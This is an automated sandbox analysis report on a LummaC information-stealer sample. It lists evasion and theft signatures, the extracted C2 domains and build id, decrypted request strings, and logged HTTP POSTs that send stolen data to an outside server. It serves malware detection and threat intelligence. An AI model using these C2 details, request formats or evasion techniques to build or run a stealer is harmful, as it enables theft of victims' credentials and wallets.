Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
YKri2nEBWE.exe

Overview

General Information

Sample name:YKri2nEBWE.exe
renamed because original name is a hash value
Original sample name:1c4c5cca8b9c930895e0e425563cf07e.exe
Analysis ID:1580915
MD5:1c4c5cca8b9c930895e0e425563cf07e
SHA1:d0db3a5c54648e8480652d342dcb2526e4f9ce4d
SHA256:36dd0a1b361b0bb7d38e1bccc954188ac2cd7d030440bbf406da3a27fb5ba098
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Detected potential crypto function
Entry point lies outside standard sections
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • YKri2nEBWE.exe (PID: 6460 cmdline: "C:\Users\user\Desktop\YKri2nEBWE.exe" MD5: 1C4C5CCA8B9C930895E0E425563CF07E)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["manyrestro.lat", "observerfry.lat", "tentabatte.lat", "wordyfindy.lat", "slipperyloo.lat", "bashfulacid.lat", "talkynicer.lat", "shapestickyr.lat", "curverpluch.lat"], "Build id": "LOGS11--LiveTraffic"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000003.2283078885.000000000159E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000003.2282746044.000000000159C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000003.2283719723.000000000159E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000000.00000003.2284073141.000000000159E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              00000000.00000003.2286941764.00000000015A7000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                Click to see the 4 entries

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-26T13:09:25.225746+010020283713Unknown Traffic192.168.2.549704104.102.49.254443TCP
                2024-12-26T13:09:27.876648+010020283713Unknown Traffic192.168.2.549705172.67.157.254443TCP
                2024-12-26T13:09:29.989306+010020283713Unknown Traffic192.168.2.549706172.67.157.254443TCP
                2024-12-26T13:09:32.689522+010020283713Unknown Traffic192.168.2.549707172.67.157.254443TCP
                2024-12-26T13:09:37.545483+010020283713Unknown Traffic192.168.2.549709172.67.157.254443TCP
                2024-12-26T13:09:40.569369+010020283713Unknown Traffic192.168.2.549717172.67.157.254443TCP
                2024-12-26T13:09:43.592013+010020283713Unknown Traffic192.168.2.549729172.67.157.254443TCP
                2024-12-26T13:09:46.195558+010020283713Unknown Traffic192.168.2.549736172.67.157.254443TCP
                2024-12-26T13:09:50.190424+010020283713Unknown Traffic192.168.2.549747172.67.157.254443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-26T13:09:28.651555+010020546531A Network Trojan was detected192.168.2.549705172.67.157.254443TCP
                2024-12-26T13:09:30.761854+010020546531A Network Trojan was detected192.168.2.549706172.67.157.254443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-26T13:09:28.651555+010020498361A Network Trojan was detected192.168.2.549705172.67.157.254443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-26T13:09:30.761854+010020498121A Network Trojan was detected192.168.2.549706172.67.157.254443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-26T13:09:23.453183+010020584801Domain Observed Used for C2 Detected192.168.2.5573091.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-26T13:09:23.166540+010020584841Domain Observed Used for C2 Detected192.168.2.5508141.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-26T13:09:22.732990+010020584921Domain Observed Used for C2 Detected192.168.2.5631011.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-26T13:09:22.875255+010020585001Domain Observed Used for C2 Detected192.168.2.5621551.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-26T13:09:22.593628+010020585021Domain Observed Used for C2 Detected192.168.2.5493921.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-26T13:09:23.026058+010020585101Domain Observed Used for C2 Detected192.168.2.5557011.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-26T13:09:23.312825+010020585121Domain Observed Used for C2 Detected192.168.2.5567561.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-26T13:09:22.355457+010020585141Domain Observed Used for C2 Detected192.168.2.5621221.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-26T13:09:44.390705+010020480941Malware Command and Control Activity Detected192.168.2.549729172.67.157.254443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-26T13:09:26.082788+010028586661Domain Observed Used for C2 Detected192.168.2.549704104.102.49.254443TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: YKri2nEBWE.exeAvira: detected
                Antivirus detection for URL or domain
                Source: https://lev-tolstoi.com/piNXxr&Avira URL Cloud: Label: malware
                Source: https://lev-tolstoi.com/WAvira URL Cloud: Label: malware
                Source: https://lev-tolstoi.com/tAvira URL Cloud: Label: malware
                Source: https://lev-tolstoi.com/apilAvira URL Cloud: Label: malware
                Source: https://lev-tolstoi.com/apixAvira URL Cloud: Label: malware
                Source: https://lev-tolstoi.com/apisAvira URL Cloud: Label: malware
                Source: https://lev-tolstoi.com/uo0Avira URL Cloud: Label: malware
                Source: https://lev-tolstoi.com/apiBAvira URL Cloud: Label: malware
                Source: https://lev-tolstoi.com/0Avira URL Cloud: Label: malware
                Source: https://lev-tolstoi.com/apimCAvira URL Cloud: Label: malware
                Found malware configuration
                Source: YKri2nEBWE.exe.6460.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["manyrestro.lat", "observerfry.lat", "tentabatte.lat", "wordyfindy.lat", "slipperyloo.lat", "bashfulacid.lat", "talkynicer.lat", "shapestickyr.lat", "curverpluch.lat"], "Build id": "LOGS11--LiveTraffic"}
                Multi AV Scanner detection for submitted file
                Source: YKri2nEBWE.exeVirustotal: Detection: 56%Perma Link
                Source: YKri2nEBWE.exeReversingLabs: Detection: 63%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: YKri2nEBWE.exeJoe Sandbox ML: detected
                Sample uses string decryption to hide its real strings
                Source: 00000000.00000003.2085036026.00000000052C0000.00000004.00001000.00020000.00000000.sdmpString decryptor: bashfulacid.lat
                Source: 00000000.00000003.2085036026.00000000052C0000.00000004.00001000.00020000.00000000.sdmpString decryptor: tentabatte.lat
                Source: 00000000.00000003.2085036026.00000000052C0000.00000004.00001000.00020000.00000000.sdmpString decryptor: curverpluch.lat
                Source: 00000000.00000003.2085036026.00000000052C0000.00000004.00001000.00020000.00000000.sdmpString decryptor: talkynicer.lat
                Source: 00000000.00000003.2085036026.00000000052C0000.00000004.00001000.00020000.00000000.sdmpString decryptor: shapestickyr.lat
                Source: 00000000.00000003.2085036026.00000000052C0000.00000004.00001000.00020000.00000000.sdmpString decryptor: manyrestro.lat
                Source: 00000000.00000003.2085036026.00000000052C0000.00000004.00001000.00020000.00000000.sdmpString decryptor: slipperyloo.lat
                Source: 00000000.00000003.2085036026.00000000052C0000.00000004.00001000.00020000.00000000.sdmpString decryptor: wordyfindy.lat
                Source: 00000000.00000003.2085036026.00000000052C0000.00000004.00001000.00020000.00000000.sdmpString decryptor: observerfry.lat
                Source: 00000000.00000003.2085036026.00000000052C0000.00000004.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                Source: 00000000.00000003.2085036026.00000000052C0000.00000004.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                Source: 00000000.00000003.2085036026.00000000052C0000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                Source: 00000000.00000003.2085036026.00000000052C0000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                Source: 00000000.00000003.2085036026.00000000052C0000.00000004.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
                Source: 00000000.00000003.2085036026.00000000052C0000.00000004.00001000.00020000.00000000.sdmpString decryptor: LOGS11--LiveTraffic
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_2_00C557C0 CryptUnprotectData,0_2_00C557C0
                Source: YKri2nEBWE.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49704 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49705 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49706 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49709 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49717 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49729 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49736 version: TLS 1.2
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h0_2_00C80340
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 4x nop then mov edx, ebx0_2_00C48600
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 4x nop then lea esi, dword ptr [eax+00000270h]0_2_00C48A50
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 4x nop then mov edi, dword ptr [esi+30h]0_2_00C4CC7A
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-16h]0_2_00C80D20
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_00C6D34A
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 4x nop then mov eax, ebx0_2_00C67440
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+09AD4080h]0_2_00C67440
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-16h]0_2_00C81720
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 4x nop then mov word ptr [eax], cx0_2_00C61A10
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_00C6E0DA
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_00C6C0E6
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_00C6C09E
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h0_2_00C681CC

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2058512 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tentabatte .lat) : 192.168.2.5:56756 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058502 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (slipperyloo .lat) : 192.168.2.5:49392 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058492 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (manyrestro .lat) : 192.168.2.5:63101 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058514 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wordyfindy .lat) : 192.168.2.5:62122 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058510 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (talkynicer .lat) : 192.168.2.5:55701 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058500 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shapestickyr .lat) : 192.168.2.5:62155 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058484 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (curverpluch .lat) : 192.168.2.5:50814 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058480 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bashfulacid .lat) : 192.168.2.5:57309 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.5:49704 -> 104.102.49.254:443
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49706 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49729 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49706 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49705 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 172.67.157.254:443
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: manyrestro.lat
                Source: Malware configuration extractorURLs: observerfry.lat
                Source: Malware configuration extractorURLs: tentabatte.lat
                Source: Malware configuration extractorURLs: wordyfindy.lat
                Source: Malware configuration extractorURLs: slipperyloo.lat
                Source: Malware configuration extractorURLs: bashfulacid.lat
                Source: Malware configuration extractorURLs: talkynicer.lat
                Source: Malware configuration extractorURLs: shapestickyr.lat
                Source: Malware configuration extractorURLs: curverpluch.lat
                Source: Joe Sandbox ViewIP Address: 172.67.157.254 172.67.157.254
                Source: Joe Sandbox ViewIP Address: 104.102.49.254 104.102.49.254
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49705 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49707 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49706 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49709 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49704 -> 104.102.49.254:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49729 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49736 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49747 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49717 -> 172.67.157.254:443
                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 53Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=KXFK18MULF3JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12805Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=VKT7L0W22DT4VG3WF7NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15089Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=GMDSDS57JOWEYUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20543Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=6D1VSVWUV9B0QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1217Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=D4K1U7QC7LXR63User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 572733Host: lev-tolstoi.com
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                Source: global trafficDNS traffic detected: DNS query: observerfry.lat
                Source: global trafficDNS traffic detected: DNS query: wordyfindy.lat
                Source: global trafficDNS traffic detected: DNS query: slipperyloo.lat
                Source: global trafficDNS traffic detected: DNS query: manyrestro.lat
                Source: global trafficDNS traffic detected: DNS query: shapestickyr.lat
                Source: global trafficDNS traffic detected: DNS query: talkynicer.lat
                Source: global trafficDNS traffic detected: DNS query: curverpluch.lat
                Source: global trafficDNS traffic detected: DNS query: tentabatte.lat
                Source: global trafficDNS traffic detected: DNS query: bashfulacid.lat
                Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                Source: global trafficDNS traffic detected: DNS query: lev-tolstoi.com
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
                Source: YKri2nEBWE.exe, 00000000.00000003.2255321255.0000000005EDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: YKri2nEBWE.exe, 00000000.00000003.2255321255.0000000005EDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: YKri2nEBWE.exe, 00000000.00000003.2255321255.0000000005EDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: YKri2nEBWE.exe, 00000000.00000003.2255321255.0000000005EDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: YKri2nEBWE.exe, 00000000.00000003.2255321255.0000000005EDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: YKri2nEBWE.exe, 00000000.00000003.2255321255.0000000005EDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: YKri2nEBWE.exe, 00000000.00000003.2255321255.0000000005EDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: YKri2nEBWE.exe, 00000000.00000003.2255321255.0000000005EDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: YKri2nEBWE.exe, 00000000.00000003.2255321255.0000000005EDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: YKri2nEBWE.exe, 00000000.00000003.2283078885.000000000159E000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2282746044.000000000159C000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2283719723.000000000159E000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2284073141.000000000159E000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2309668421.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000002.2368577753.00000000015B8000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2286941764.00000000015A7000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2287405344.00000000015AA000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2327042056.00000000015A7000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2366814829.00000000015B5000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2174533511.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2326949332.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                Source: YKri2nEBWE.exe, 00000000.00000003.2283078885.000000000159E000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2282746044.000000000159C000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2283719723.000000000159E000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2284073141.000000000159E000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2309668421.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000002.2368577753.00000000015B8000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2286941764.00000000015A7000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2287405344.00000000015AA000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2327042056.00000000015A7000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2366814829.00000000015B5000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151309651.000000000152C000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2174533511.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2326949332.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
